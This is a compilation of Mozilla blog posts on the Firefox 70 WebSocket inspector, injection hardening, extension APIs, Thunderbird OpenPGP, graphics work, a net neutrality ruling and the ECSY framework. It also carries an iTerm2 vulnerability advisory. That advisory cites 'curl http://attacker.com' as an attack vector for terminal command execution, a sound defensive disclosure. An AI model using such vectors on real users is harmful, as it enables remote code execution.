hacks.mozilla.org: Firefox’s New WebSocket Inspector

The Firefox DevTools team and our contributors were hard at work over the summer, getting Firefox 70 jam-packed with improvements. We are especially excited about our new WebSocket inspection feature, because you told us in feedback how important it would be for your daily work.

To use the inspector now, download Firefox Developer Edition, open DevTools’ Network panel, and find the Messages tab. Then, keep reading to learn more about WebSockets and the tricks that the new panel has up its sleeve.

But first, big thanks to Heng Yeow Tan, the Google Summer of Code (GSoC) student who’s responsible for the implementation.

A Primer on WebSockets

We use the WebSocket (WS) API to create a persistent connection between a client and server. Because the API allows data to be sent and received at any time, it is used mainly in applications requiring real-time communication.
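For illustration, a minimal client built on the raw WS API might look like the sketch below. The endpoint URL and the JSON message envelope are placeholder assumptions, and the snippet is guarded so it only runs in a browser:

```javascript
// Minimal sketch of the raw WebSocket API. The endpoint and the JSON
// message envelope are placeholders, not taken from the article.
function encodeMessage(type, payload) {
  return JSON.stringify({ type, payload });
}

if (typeof window !== "undefined" && "WebSocket" in window) {
  const socket = new WebSocket("wss://example.com/socket");

  socket.addEventListener("open", () => {
    // Data can be sent at any time once the connection is open.
    socket.send(encodeMessage("chat", "hello"));
  });

  socket.addEventListener("message", event => {
    console.log("received:", event.data);
  });
}
```

Frames sent and received by code like this are exactly what the new Messages panel displays.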

Although it is possible to work directly with the WS API, some existing libraries come in handy and help save time. These libraries can help with connection failures, proxies, authentication and authorization, scalability, and much more. The WS inspector in Firefox DevTools currently supports Socket.IO and SockJS, but more support is in the works.

Want to learn more about how to set up WebSocket for your client applications? Head over to MDN’s guides. In the meantime, let’s dive into the new feature.

Getting started with the WebSocket Inspector

The WebSocket Inspector is part of the existing Network panel UI in DevTools. It’s already possible to filter the content for opened WS connections in this panel, but until now there was no way to see the actual data transferred through WS frames.

The following screenshot shows the WS filter in action. Only the 101 request (WebSocket Protocol Handshake) is visible. The response code indicates that the server is switching to a WS connection.

A screenshot of the Network Monitor panel showing the WS inspection feature

Clicking on the 101 request opens the familiar sidebar, showing details about the selected HTTP request. In addition, the UI now offers a fresh new Messages panel that can be used to inspect WS frames sent and received through the selected WS connection.

The WS inspector in the Network Panel, showing messages

The live-updated table shows data for sent (green arrow) and received (red arrow) WS frames. Each frame expands on click, so you can inspect the formatted data.

To focus on specific messages, frames can be filtered using free text.

A screenshot showing a test of the 101 response in the Messages panel

The Data and Time columns are visible by default, but you can customize the interface to see more columns by right-clicking on the header.

Screenshot showing Messages filtering options in Firefox Dev Tools panel

Selecting a frame in the list shows a preview at the bottom of the Messages panel.

Screenshot of Message showing plain text data sent over WebSocket connection

The inspector currently supports the following WS protocols – and we have more planned:

  • Plain JSON
  • Socket.IO
  • SockJS

Payload based on those protocols is parsed and displayed as an expandable tree for easy inspection. Of course, you can still see the raw data (as sent over the wire) as well.

Screenshot showing Messages sent via JSON and Socket.IO

Use the pause/resume button in the Network panel toolbar to stop intercepting WS traffic. This allows you to capture only the frames that you are interested in.

Screenshot of network monitor showing the pause/resume button for WS inspection

What’s next for the WebSockets inspector

We wanted to release this initial feature set quickly to let you use it. We have a few things that we are still working on for upcoming releases:

  • Binary payload viewer
  • Indicating closed connections
  • Exporting WS frames (as part of HAR)
  • See our backlog for more of what’s coming

We would love your feedback on the new WebSocket Inspector, which is available now in Firefox Developer Edition 70. If you haven’t had a chance yet, install and open Developer Edition, then follow along with this post to master WebSocket debugging.

The post Firefox’s New WebSocket Inspector appeared first on Mozilla Hacks - the Web developer blog.

Web Application Security: Hardening Firefox against Injection Attacks

A proven, effective way to counter code injection attacks is to reduce the attack surface by removing potentially dangerous artifacts from the codebase, hardening the code at various levels. To make Firefox resilient against such code injection attacks, we removed occurrences of inline scripts as well as eval()-like functions.

Removing Inline Scripts and adding Guards to prevent Inline Script Execution

Firefox not only renders web pages from the internet but also ships with a variety of built-in pages, commonly referred to as about: pages. Such about: pages provide an interface to reveal the internal state of the browser. Most prominent is about:config, which exposes an API to inspect and update preferences and settings, allowing Firefox users to tailor their Firefox instance to their specific needs.

Since such about: pages are also implemented using HTML and JavaScript, they are subject to the same security model as regular web pages and therefore are not immune to code injection attacks. More concretely, if an attacker manages to inject code into such an about: page, it potentially allows the attacker to execute the injected script code in the security context of the browser itself, allowing the attacker to perform arbitrary actions on behalf of the user.

To better protect our users and to add an additional layer of security to Firefox, we rewrote all inline event handlers and moved all inline JavaScript code to packaged files for all 45 about: pages. This allowed us to apply a strong Content Security Policy (CSP) such as ‘default-src chrome:’ which ensures that injected JavaScript code does not execute. Instead JavaScript code only executes when loaded from a packaged resource using the internal chrome: protocol. Not allowing any inline script in any of the about: pages limits the attack surface of arbitrary code execution and hence provides a strong first line of defense against code injection attacks.
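As a sketch of that rewrite pattern: an inline handler such as <button onclick="restart()"> would be blocked by such a CSP, so the packaged script attaches the listener instead. The element id and handler name below are hypothetical, not taken from the Firefox codebase:

```javascript
// Hypothetical example of moving an inline handler into a packaged
// script. The "restart-button" id and the onRestart callback are
// made-up names for illustration.
function wireRestartButton(doc, onRestart) {
  doc.getElementById("restart-button")
     .addEventListener("click", onRestart);
}

// In the about: page's packaged script this would run as:
//   wireRestartButton(document, restart);
```

Because the listener lives in a chrome:-packaged file, it satisfies a ‘default-src chrome:’ policy while injected markup cannot execute.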

Removing eval()-like Functions and adding Runtime Assertions to prevent eval()

The JavaScript function eval(), along with similar constructs such as new Function and setTimeout()/setInterval() with string arguments, is a powerful yet dangerous tool. It parses and executes an arbitrary string in the same security context as its caller. This execution scheme conveniently allows executing code generated at runtime or stored in non-script locations like the Document Object Model (DOM). The downside, however, is that eval() introduces a significant attack surface for code injection, and we discourage its use in favour of safer alternatives.
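One common safer alternative: when the string holds data rather than code, JSON.parse produces only values and never executes anything. This is an illustrative example, not code from the Firefox codebase:

```javascript
// eval() would run any code embedded in an untrusted string;
// JSON.parse only ever yields data values.
const untrusted = '{"theme": "dark", "fontSize": 14}';

// Dangerous pattern (executes arbitrary embedded code):
//   const settings = eval("(" + untrusted + ")");

// Safe alternative:
const settings = JSON.parse(untrusted);
console.log(settings.theme); // "dark"
```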

To further minimize the attack surface in Firefox and discourage the use of eval() we rewrote all use of ‘eval()’-like functions from system privileged contexts and from the parent process in the Firefox codebase. Additionally we added assertions, disallowing the use of ‘eval()’ and its relatives in system-privileged script contexts.

Unexpectedly, in our effort to monitor and remove all eval()-like functions we also encountered calls to eval() outside of our codebase. For some background: a long time ago, Firefox supported a mechanism that allowed you to execute user-supplied JavaScript in the execution context of the browser. This feature, called userChrome.js and now considered a security risk, allowed you to customize Firefox at startup time. After that mechanism was removed, users found a way to accomplish the same thing through a few other unintended tricks. Unfortunately, we have no control over what users put in these customization files, but our runtime checks confirmed that in a few rare cases they included eval. When we detect that a user has enabled such tricks, we disable our blocking mechanism and allow the usage of eval().

Going forward, our introduced eval() assertions will continue to inform the Mozilla Security Team of yet unknown instances of eval() which we will closely audit and evaluate and restrict as we further harden the Firefox Security Landscape.

For the Mozilla Security Team,
Vinothkumar Nagasayanan, Jonas Allmann, Tom Ritter, and Christoph Kerschbaumer


The post Hardening Firefox against Injection Attacks appeared first on Mozilla Security Blog.

hacks.mozilla.org: The Mozilla Developer Roadshow Talks: Firefox, WebAssembly, CSS, WebXR and More

The Mozilla Developer Roadshow program launched in 2017. Our mission: Bring expert speakers and technology updates to local communities through free events and partnerships. These interactive meetup-style events help developers find resources and activities relevant to their day-to-day productivity and professional skill development.

Dev Roadshow EU, August 2019

The roadshow through Germany and Austria featured four back-to-back evening events from August 26th-29th. In Nuremberg, Munich, Linz, and Vienna, we met over 400 local developers and designers in their hometowns. In fact, at every stop we found strong interest and lively curiosity about the web platform.

For this tour, Mozilla partnered with the beyond tellerrand team, led by Marc Thiele. And today, we’re excited to share the video recordings with you!

The Talks

Five Mozilla speakers presented in each city; we added guest speakers in Munich and Vienna. First up, Ali Spivak, Mozilla’s Director of Developer Relations, opened each session with an overview of Firefox and highlights from our emerging technology projects.

An Update on Firefox and Mozilla

In addition, each event included our signature networking hour. As always, we encouraged attendees and speakers to bridge the speaking stage gap. In this informal setting, we enjoyed real conversations about the real concerns of people who work on the web. Mozilla TechSpeakers Hui Jing Chen and Fabien Benetou joined the team, along with Mozilla Research Engineer Diane Hosfelt, and Developer Advocate Dan Callahan.

Understanding Modern CSS

XR in the Browser

Engineering for privacy in Mixed Reality

WebAssembly in the Browser and Beyond

Dev Roadshow Asia: Register now

In November, the Mozilla Developer Roadshow tour continues in Asia. Free tickets are now available, so you can register today for one of the following events:

Make sure to secure your spot by registering now!

The post The Mozilla Developer Roadshow Talks: Firefox, WebAssembly, CSS, WebXR and More appeared first on Mozilla Hacks - the Web developer blog.

Mozilla Add-ons Blog: Extensions in Firefox 70

Welcome to another round of new additions and changes to extensions, this time in Firefox 70. We have a new API, some improvements on existing APIs, and some great additions to Firefox Developer Tools to make it easier to debug your extensions.

Network Status

Firefox 70 features a new network status API. It can be used to determine if an internet connection is available and provides insight into what type of connection the user is on. A potential use case for this would be for developers to limit the data they are transferring on a mobile connection. Here is an example:

async function upload(url, buffer) {
  let info = await browser.networkStatus.getLinkInfo();
  let isMobile = ["wimax", "2g", "3g", "4g"].includes(info.type);

  // Only sending every second byte on mobile. Clever savings, eh?
  let body = buffer;
  if (isMobile) {
    body = body.filter((elem, index) => index % 2 == 0);
  }

  console.log(`Uploading via ${info.type} connection named ${info.id}`);

  switch (info.status) {
    case "down":
      await handleOfflineMode(url, buffer);
      break;
    case "up":
    case "unknown":
      await fetch(url, {
        method: "POST",
        headers: { "Content-Type": "application/octet-stream" },
        body: body
      });
      break;
  }
}
There is also an onConnectionChanged event available that is called with the changed link info.
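A sketch of listening for those changes is shown below. The formatting helper is our own illustration, and the listener only registers inside an extension where browser.networkStatus exists:

```javascript
// Hypothetical helper for the changed link info the event delivers
// (info.type e.g. "wifi" or "3g"; info.status "up", "down" or "unknown").
function describeLink(info) {
  return `${info.type || "unknown"} link is ${info.status}`;
}

// Only available in a WebExtension context with the right permission.
if (typeof browser !== "undefined" && browser.networkStatus) {
  browser.networkStatus.onConnectionChanged.addListener(info => {
    console.log(describeLink(info));
  });
}
```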

Downloads API Improvements

We’ve made a few improvements to the downloads API in Firefox 70. By popular request, the Referer header is now allowed in the browser.downloads.download API’s headers object. This allows extensions, such as download managers, to download files for sites that require a referrer to be set.
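A sketch of such a call follows. The URLs and filename are placeholders; the headers array shape matches the downloads API's options object:

```javascript
// Placeholder URLs and filename; the Referer entry is the new part.
function buildDownloadOptions(url, referer) {
  return {
    url,
    filename: "report.pdf",
    headers: [{ name: "Referer", value: referer }],
  };
}

// Only runs inside an extension with the "downloads" permission.
if (typeof browser !== "undefined" && browser.downloads) {
  browser.downloads
    .download(buildDownloadOptions(
      "https://example.com/report.pdf",
      "https://example.com/reports/"))
    .catch(err => console.error(`Download failed: ${err.message}`));
}
```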

Also, we’ve improved error reporting for failed downloads. In addition to previously reported failures, the browser.downloads.download API will now report an error in case of various http 4xx failures. This makes the API more compatible with Chrome and gives developers a way to react to these errors in their code. [Edit: Sorry if I got your hopes up! This is actually coming in Firefox 71!]

Privacy API Improvements

If you are using the browser.privacy.network API and are modifying webRTCIPHandlingPolicy, we’ve made some compatibility changes to the disable_non_proxied_udp setting. This setting now better matches Chrome’s behavior. If your add-on relied on the Firefox-specific behavior, you can make use of the new setting proxy_only.
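A sketch of opting back in to the Firefox-specific behavior via the new value; the helper function is illustrative, while the setting names come from the text above:

```javascript
// Illustrative helper: pick between the Chrome-compatible value and
// the new Firefox-specific one described above.
function chooseWebRTCPolicy(keepFirefoxBehavior) {
  return keepFirefoxBehavior ? "proxy_only" : "disable_non_proxied_udp";
}

// Only runs inside an extension with the "privacy" permission.
if (typeof browser !== "undefined" && browser.privacy) {
  browser.privacy.network.webRTCIPHandlingPolicy
    .set({ value: chooseWebRTCPolicy(true) });
}
```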

Extension Storage Inspector

Starting in Firefox 70, Firefox finally supports inspecting data from the browser.storage API using the DevTools Storage Inspector. When you inspect an add-on via about:debugging, you will find a new Extension Storage section in the storage panel. While changing the values is not currently supported, this will make debugging your add-ons even easier.

Firefox developer tools showing extension storage data in a multi-column list.

Extension Storage Inspector

Unsupported Theme Properties

The accentcolor, headerURL and text_color properties are now unsupported. Please use the replacement properties frame, theme_frame, and tab_background_text. You can find more information in our previous deprecation announcement.


  • When managing extension shortcuts, you will now be notified if a shortcut is already in use.
  • The browser.notifications.onClicked and browser.notifications.onShown event callbacks are no longer called with a superfluous second parameter.
  • Logging has been improved when the native messaging host manifest is missing.
  • Various performance improvements, making startup quicker for Firefox users with add-ons.

Special thanks this time goes to our volunteers Trishul Goel, Myeongjun Go, Graham McKnight and Tom Schuster. We’ve also received an awesome contribution from Mandy Cheang as part of her internship at Mozilla. Keep up the great work everyone!

The post Extensions in Firefox 70 appeared first on Mozilla Add-ons Blog.

Web Application Security: Critical Security Issue identified in iTerm2 as part of Mozilla Open Source Audit

A security audit funded by the Mozilla Open Source Support Program (MOSS) has discovered a critical security vulnerability in the widely used macOS terminal emulator iTerm2. After finding the vulnerability, Mozilla, Radically Open Security (ROS, the firm that conducted the audit), and iTerm2’s developer George Nachman worked closely together to develop and release a patch to ensure users were no longer subject to this security threat. All users of iTerm2 should update immediately to the latest version (3.3.6) which has been published concurrent with this blog post.

Founded in 2015, MOSS broadens access, increases security, and empowers users by providing catalytic support to open source technologists. Track III of MOSS — created in the wake of the 2014 Heartbleed vulnerability — supports security audits for widely used open source technologies like iTerm2. Mozilla is an open source company, and the funding MOSS provides is one of the key ways that we continue to ensure the open source ecosystem is healthy and secure.

iTerm2 is one of the most popular terminal emulators in the world, and frequently used by developers. MOSS selected iTerm2 for a security audit because it processes untrusted data and it is widely used, including by high-risk targets (like developers and system administrators).

During the audit, ROS identified a critical vulnerability in the tmux integration feature of iTerm2; this vulnerability has been present in iTerm2 for at least 7 years. An attacker who can produce output to the terminal can, in many cases, execute commands on the user’s computer. Example attack vectors for this would be connecting to an attacker-controlled SSH server or commands like curl http://attacker.com and tail -f /var/log/apache2/referer_log. We expect the community will find many more creative examples.

Proof-of-Concept video of a command being run on a mock victim’s machine after connecting to a malicious SSH server. In this case, only a calculator was opened as a placeholder for other, more nefarious commands.

Typically, this vulnerability would require some degree of user interaction or trickery, but because it can be exploited via commands generally considered safe, there is a high degree of concern about the potential impact.

An update to iTerm2 is now available with a mitigation for this issue, which has been assigned CVE-2019-9535. While iTerm2 will eventually prompt you to update automatically, we recommend you proactively update by going to the iTerm2 menu and choosing Check for updates… The fix is available in version 3.3.6. A prior update (3.3.5) was published earlier this week; it does not contain the fix.

If you’d like to apply for funding or an audit from MOSS, you can find application links on the MOSS website.

The post Critical Security Issue identified in iTerm2 as part of Mozilla Open Source Audit appeared first on Mozilla Security Blog.

The Mozilla Thunderbird Blog: Thunderbird, Enigmail and OpenPGP

Today the Thunderbird project is happy to announce that for the future Thunderbird 78 release, planned for summer 2020, we will add built-in functionality for email encryption and digital signatures using the OpenPGP standard. This new functionality will replace the Enigmail add-on, which will continue to be supported until Thunderbird 68 end of life, in the Fall of 2020.

For some background on encrypted email in Thunderbird: Two popular technologies exist that add support for end-to-end encryption and digital signatures to email. Thunderbird has been offering built-in support for S/MIME for many years and will continue to do so.

The Enigmail Add-on has made it possible to use Thunderbird with external GnuPG software for OpenPGP messaging. Because the types of add-ons supported in Thunderbird will change with version 78, the current Thunderbird 68.x branch (maintained until Fall 2020) will be the last that can be used with Enigmail.

For users of Enigmail, Thunderbird 78 will offer assistance to migrate existing keys and settings. We are happy that Patrick Brunschwig, the long-time developer of Enigmail, has offered to work with the Thunderbird team on OpenPGP going forward. About this change, Patrick had this to say:

“It has always been my goal to have OpenPGP support included in the core Thunderbird product. Even though it will mark an end to a long story, after working on Enigmail for 17 years, I’m very happy with this outcome.”

Users who haven’t used Enigmail previously will need to opt in to use OpenPGP messaging, as encryption will not be enabled automatically. However, Thunderbird 78 will help users discover the new functionality.

To promote secure communication, Thunderbird 78 will encourage the user to perform ownership confirmation of keys used by correspondents, notify the user if the correspondent’s keys change unexpectedly, and, if there is an issue, offer assistance to resolve the situation.

It’s undecided whether Thunderbird 78 will support the indirect key ownership confirmations used in the Web of Trust (WoT) model, or to what extent. However, sharing of key ownership confirmations made by the user (key signatures), and interaction with OpenPGP key servers shall be possible.

If you have an interest in seeing more detailed plans on what is in store for OpenPGP in Thunderbird, check out our wiki page with more information.

Mozilla Gfx Team: moz://gfx newsletter #48

Greetings! This issue of the newsletter is long overdue. Without further ado:

What’s new in gfx

Wayland dmabuf textures

Martin Stransky landed the dmabuf texture work which was at the prototype stage at the time of the previous newsletter. This is only used with the GL compositor at the moment which is not enabled by default (gfx.acceleration.force-enabled pref in about:config). Work to get dmabuf textures with WebRender is in progress.

CoreAnimation integration

Markus landed a number of infrastructure changes towards integrating with CoreAnimation and doing partial present optimizations on MacOS.
This short description doesn’t do justice to the amount of work that went into this. Stay tuned, you might read some more about this on this blog soon.

Direct Composition integration

Sotaro has been working on a number of bugs in support for Direct Composition integration, including some ground work and investigation such as bugs 1585893, 1585619 and 1585278, and bug fixes like an issue involving the tab bar, direct composition, the high contrast theme and WebRender.


Andrew landed a number of image decoding performance improvements, using SIMD to speed up pixel format conversion.
Benchmarks targeting the improvements suggested a ceiling of 25-50% faster pixel format conversions, with initial telemetry data suggesting a 5-10% real-world average decoder performance improvement. Not bad!

What’s new in WebRender

WebRender is a GPU-based 2D rendering engine for the web, written in Rust, currently powering Firefox’s rendering as well as the research web browser Servo.

To enable WebRender in Firefox, in the about:config, enable the pref gfx.webrender.all and restart the browser.

WebRender is available as a standalone crate on crates.io (documentation) for use in your own rust projects.

WebRender enabled in Firefox Preview Nightly on the Pixel 2

This is the first configuration on Android that Jamie enabled WebRender on by default. A pretty cool milestone to build upon!
Download it here: https://play.google.com/store/apps/details?id=org.mozilla.fenix.nightly
WebRender is only enabled by default for Pixel 2 phones at the moment, but it can be enabled on other configurations in about:config.

Pixel snapping

Andrew rewrote pixel snapping in WebRender. See the bug description and the six patches series that followed to get an idea of how much work went into this.

Blob image recoordination

If you have been following this newsletter you might remember hearing about “blob image recoordination” for a while now. That’s because the work has been ongoing for quite a while. A lot of patches that had been in the works for months landed recently. Blobs are now “recoordinated”.

In other words, Jeff and Nical landed a lot of infrastructure work to handle the coordinate system of blob images, WebRender’s fallback software rendering path.

This puts the fallback code on a saner foundation and allows reducing the invalidation of blob images in various scenarios such as scrolling large SVG elements, or when animations cause the bounds of a blob image to change. This translates to performance improvements on web pages that use SVG a lot.

Picture caching

Glenn landed some pretty big changes to picture caching:

  • The cache is now organized as a quad-tree.
  • Picture cached tiles that are only solid color use a fast path to optimize speed and memory consumption.
  • There is a new composite pass with a simpler drawing model than other render passes. It is a first step towards deferring the composition of cached tiles to OS compositor APIs such as Direct Composition and Core Animation, and will allow optimizations for the upcoming software backend.
  • There are now separate picture cache slices for web content, the browser UI and scroll bars.
  • WebRender now generates dirty rects to allow partial present optimizations.

YUV image rendering performance

Kvark fixed YUV images being accidentally rendered in the alpha pass instead of the opaque pass. A very simple change yielding pretty significant performance improvements as it reduces the overdraw while rendering video frames.

Text rendering improvements

Lee removed Cairo usage from the Skia FreeType font host. SkFontHost_cairo depended on the interposition of Cairo for dealing with creating/loading FreeType faces. This imposed annoying limits on our Skia text rasterization such as a lack of sub-pixel text positioning on Android and Linux. It also forced us to build and maintain FcPattern structures that caused memory bloat and had performance overhead to interpret.
With this fixed, Lee enabled sub-pixel positioning on Linux and Android.

Various fixes and improvements

  • Botond fixed a regression affecting WebExtensions that move a tab into a popup or panel window (1), (2).
  • Botond fixed an issue that prevented Windows users with certain Acer and Asus laptops from being able to two-finger scroll on Gmail and various other websites.
  • Botond fixed one of the prerequisites for enabling a hiding URL bar in Firefox Preview.
  • Kvark improved WebRender’s performance when allocating a page requires a lot of cached texture memory.
  • Kvark added support for the Solus Linux distribution in Gecko’s build system.
  • Kvark updated the WebGPU IDL.
  • Kvark fixed a few IDL bindgen issues in the process (1), (2).
  • Andrew prevented border raster images from going through a slow fallback path.
  • AWilcox fixed YUV image rendering on big-endian machines.
  • Nical cleaned up a lot of the scene building and render graph code in WebRender.
  • Kris fixed an opacity rendering issue on SVG USE elements with D2D.
  • Jonathan Kew fixed a rendering issue with stroked text with ligatures.

The Mozilla Blog: Breaking down this week’s net neutrality court decision

This week, the U.S. Court of Appeals for the D.C. Circuit issued its ruling in Mozilla v. Federal Communications Commission (FCC), the court case to defend net neutrality protections for American consumers. The opinion opened a path for states to put net neutrality protections in place, even as the fight over FCC federal regulation is set to continue. While the decision is disappointing as it failed to restore net neutrality protections at the federal level, the fight for these essential consumer rights will continue in the states, in Congress, and in the courts.

The three-judge panel disagreed with the FCC’s argument that the FCC is able to preempt state net neutrality legislation across the board. States have already shown that they are ready to step in and enact net neutrality rules to protect consumers, with laws in California and Vermont among others. The Court is also requiring the FCC to consider the effect the repeal may have on public safety and subsidies for low-income consumer broadband internet access.

The Court did find that the FCC had discretion to treat broadband access like an information service and remove the previous rules. But as Judge Millett said (and Judge Wilkins concurred), that was with significant reservations: “I am deeply concerned that the result [of upholding much of the 2018 Order] is unhinged from the realities of modern broadband service.” Nevertheless, the judges stated that they felt their hands were tied by the existing legal precedent and invited the Supreme Court or Congress to step in.

The decision also underscores the frailty of the FCC’s approach. Questioning the FCC’s reclassification of broadband internet access from a “telecommunications service” to an “information service,” Judge Millett reprised an argument made by Mozilla and other petitioners: “[F]ollowing the Commission’s view to its logical conclusion, everything (including telephones) would be an information service. The only thing left within ‘telecommunications service’ would be the proverbial road to nowhere.”

We are exploring next steps to move the case forward for consumers, and we are grateful to be a part of a broad community pressing for net neutrality protections. We look forward to continuing this fight.

The post Breaking down this week’s net neutrality court decision appeared first on The Mozilla Blog.

Mozilla VR Blog: Introducing ECSY: an Entity Component System framework for the Web

Today we are introducing ECSY (pronounced “eck-see”): a new, highly experimental Entity Component System framework for JavaScript.

After working on many interactive graphics projects for the web over the last few years, we tried to identify the common issues that come up when developing something bigger than a simple example.
Based on our findings, we discussed what an ideal framework would need:

  • Component-based: Help to structure and reuse code across multiple projects.
  • Predictable: Avoids random events or callbacks interrupting the main flow, which would make it hard to debug or trace what is going on in the application.
  • Good performance: Most web graphics applications are CPU bound, so we should focus on performance much more.
  • Simple API: The core API should be simple, making the framework easier to understand, optimize and contribute to; but also allow building more complex layers on top of it if needed.
  • Graphics engine agnostic: It should not be tied to any specific graphics engine or framework.

These requirements are high-level features that are not usually provided by graphics engines like three.js or babylon.js. On the other hand, A-Frame provides a nice component-based architecture, which is really handy when developing bigger projects, but it lacks the rest of the previously mentioned features. For example:

  • Performance: Dealing with the DOM implies overhead. Although we have been building A-Frame applications with good performance, this could be done by breaking the API contract, for example by accessing the values of the components directly instead of using setAttribute/getAttribute. This can lead to some unwanted side effects, such as incompatibility between components and a lack of reactive behavior.
  • Predictable: Dealing with asynchrony because of the DOM life cycle or the events’ callbacks when modifying attributes makes the code really hard to debug and to trace.
  • Graphics engine agnostic: Currently A-Frame and its components are so strongly tied to Three.js that it makes no sense to change it to any other engine.

After analyzing these points, gathering our experience with three.js and A-Frame, and looking at the state of the art on game engines like Unity, we decided to work on building this new framework using a pure Entity Component System architecture. The difference between a pure ECS like Unity DOTS, entt, or Entitas, and a more object oriented approach, such as Unity’s MonoBehaviour or A-Frame's Components, is that in the latter the components and systems both have logic and data, while with a pure ECS approach components just have data (without logic) and the logic resides in the systems.

Focusing on building a simple core for this new framework helps us iterate faster when developing new applications and lets us implement new features on top of it as needed. It also allows us to use it with existing libraries such as three.js, Babylon.js, Phaser, and PixiJS, to interact directly with the DOM, Canvas or WebGL APIs, or to prototype around new APIs such as WebGPU, WebAssembly or WebWorkers.

Technology stack examples


We decided to use a data-oriented architecture as we noticed that having data and logic separated helps us better think about the structure of our applications. This also allows us to work internally on optimizations, for example how to store and access this data or how to get the advantage of parallelism for the logic.

The terms you must know in order to work with our framework are mostly the same as any other ECS:

  • Entities: Empty objects with unique IDs that can have multiple components attached to them.
  • Components: Different facets of an entity, e.g. geometry, physics, hit points. Components only store data.
  • Systems: Where the logic is. They do the actual work by processing entities and modifying their components. They are data processors, basically.
  • Queries: Used by systems to determine which entities they are interested in, based on the components the entities own.
  • World: A container for entities, components, systems, and queries.

ECSY Architecture


So far all the information has been quite abstract, so let’s dig into a simple example to see how the API feels.

The example will consist of boxes and circles moving around the screen, nothing fancy but enough to understand how the API works.

We will start by defining components that will be attached to the entities in our application:

  • Position: The position of the entity on the screen.
  • Velocity: The speed and direction in which the entity moves.
  • Shape: The type of shape the entity has: circle or box.

Now we will define the systems that will hold the logic in our application:

  • MovableSystem: It will look for entities that have velocity and position, and it will update their position component.
  • RendererSystem: It will paint the shapes at their current positions.

Circles and balls example design

Below is the code for the example described above. Some parts have been omitted for brevity (check the full source code on GitHub or Glitch).

We start by defining the components we will be using:

// Velocity component
class Velocity {
  constructor() {
    this.x = this.y = 0;
  }
}

// Position component
class Position {
  constructor() {
    this.x = this.y = 0;
  }
}

// Shape component
class Shape {
  constructor() {
    this.primitive = 'box';
  }
}

// Renderable component
class Renderable extends TagComponent {}

Now we implement the two systems our example will use:

// MovableSystem
class MovableSystem extends System {
  // This method will get called on every frame by default
  execute(delta, time) {
    // Iterate through all the entities on the query
    this.queries.moving.results.forEach(entity => {
      var velocity = entity.getComponent(Velocity);
      var position = entity.getMutableComponent(Position);
      position.x += velocity.x * delta;
      position.y += velocity.y * delta;

      // Wrap around the screen edges
      if (position.x > canvasWidth + SHAPE_HALF_SIZE) position.x = -SHAPE_HALF_SIZE;
      if (position.x < -SHAPE_HALF_SIZE) position.x = canvasWidth + SHAPE_HALF_SIZE;
      if (position.y > canvasHeight + SHAPE_HALF_SIZE) position.y = -SHAPE_HALF_SIZE;
      if (position.y < -SHAPE_HALF_SIZE) position.y = canvasHeight + SHAPE_HALF_SIZE;
    });
  }
}

// Define a query of entities that have "Velocity" and "Position" components
MovableSystem.queries = {
  moving: {
    components: [Velocity, Position]
  }
};

// RendererSystem
class RendererSystem extends System {
  // This method will get called on every frame by default
  execute(delta, time) {
    ctx.globalAlpha = 1;
    ctx.fillStyle = "#ffffff";
    ctx.fillRect(0, 0, canvasWidth, canvasHeight);

    // Iterate through all the entities on the query
    this.queries.renderables.results.forEach(entity => {
      var shape = entity.getComponent(Shape);
      var position = entity.getComponent(Position);
      if (shape.primitive === 'box') {
        this.drawBox(position);
      } else {
        this.drawCircle(position);
      }
    });
  }
  // drawBox and drawCircle omitted for brevity
}

// Define a query of entities that have "Renderable" and "Shape" components
RendererSystem.queries = {
  renderables: { components: [Renderable, Shape] }
};

We create a world and register the systems that it will use:

var world = new World();

world
  .registerSystem(MovableSystem)
  .registerSystem(RendererSystem);

We create some entities with random position, speed, and shape.

for (let i = 0; i < NUM_ELEMENTS; i++) {
  world
    .createEntity()
    .addComponent(Velocity, getRandomVelocity())
    .addComponent(Shape, getRandomShape())
    .addComponent(Position, getRandomPosition())
    .addComponent(Renderable);
}

Finally, we just have to update it on each frame:

function run() {
  // Compute delta and elapsed time
  var time = performance.now();
  var delta = time - lastTime;

  // Run all the systems
  world.execute(delta, time);

  lastTime = time;

  // Queue the next frame
  requestAnimationFrame(run);
}

var lastTime = performance.now();
run();


The main features that the framework currently has are:

  • Engine/framework agnostic: You can use ECSY directly with whichever 2D or 3D engine you are already used to. We have provided some simple examples for Babylon.js, three.js, and 2D canvas. To make things even easier, we plan to release a set of bindings and helper components for the most commonly used engines, starting with three.js.
  • Focused on providing a simple, yet efficient API: We want to make sure to keep the API surface as small as possible, so that the core remains simple and is easy to maintain and optimize. More advanced features can be layered on top, rather than being baked into the core.
  • Designed to avoid garbage collection as much as possible: It will try to use pools for entities and components whenever possible, so objects won’t be allocated when adding new entities or components to the world.
  • Systems, entities, and components are scoped in a “world” instance: This means that we don’t register the components or systems in the global scope, allowing you to have multiple worlds or apps running on the same page without interference between them.
  • Multiple queries per system: You can define as many queries per system as you want.
  • Reactive support:
    • Systems can react to changes in the entities and components
    • Systems can get mutable or immutable references to components on an entity.
  • Predictable:
    • Systems will always run in the order they were registered or based on a priority attribute.
    • Reactive events won’t generate “random” callbacks when emitted. Instead they will be queued and processed in order, when the listener systems are executed.
  • Modern Javascript: ES6, classes, modules
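The garbage-collection point deserves a concrete illustration. The sketch below shows the general pooling pattern in plain JavaScript; it is not ECSY's actual internal implementation, just the idea it aims for: recycle released instances so that steady entity churn allocates nothing new.

```javascript
// Object-pool sketch (illustrative; not ECSY's internals): reuse released
// instances instead of allocating a new object on every acquire.
class Pool {
  constructor(factory) {
    this.factory = factory; // creates a fresh instance when the pool is empty
    this.free = [];
  }
  acquire() {
    return this.free.length > 0 ? this.free.pop() : this.factory();
  }
  release(obj) {
    this.free.push(obj);
  }
}

const positionPool = new Pool(() => ({ x: 0, y: 0 }));
const p = positionPool.acquire();  // first use: fresh allocation
positionPool.release(p);           // back into the pool
const q = positionPool.acquire();  // recycled: no new allocation
console.log(p === q); // true
```

A real component pool would also reset an instance's fields on release, so a recycled Position doesn't leak stale coordinates into a new entity.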

What’s next?

This project is still in its early days so you can expect a lot of changes with the API and many new features to arrive in the upcoming weeks. Some of the ideas we would like to work on are:

  • Syntactic sugar: As the API is still evolving we have not focused on adding a lot of syntactic sugar, so currently there are places where the code is very verbose.
  • Developer tools: In the coming weeks we plan to release a developer tools extension to visualize the status of the ECS on your application and help you debug and understand its status.
  • ecsy-three: As discussed previously ecsy is engine-agnostic, but we will be working on providing bindings for commonly used engines starting with three.js.
  • Declarative layer: Based on our experience working with A-Frame, we understand the value of having a declarative layer so we would like to experiment with that on ECSY too.
  • More examples: Keep adding examples that use a diverse range of underlying APIs, such as Canvas and WebGL, and engines like three.js, Babylon.js, etc.
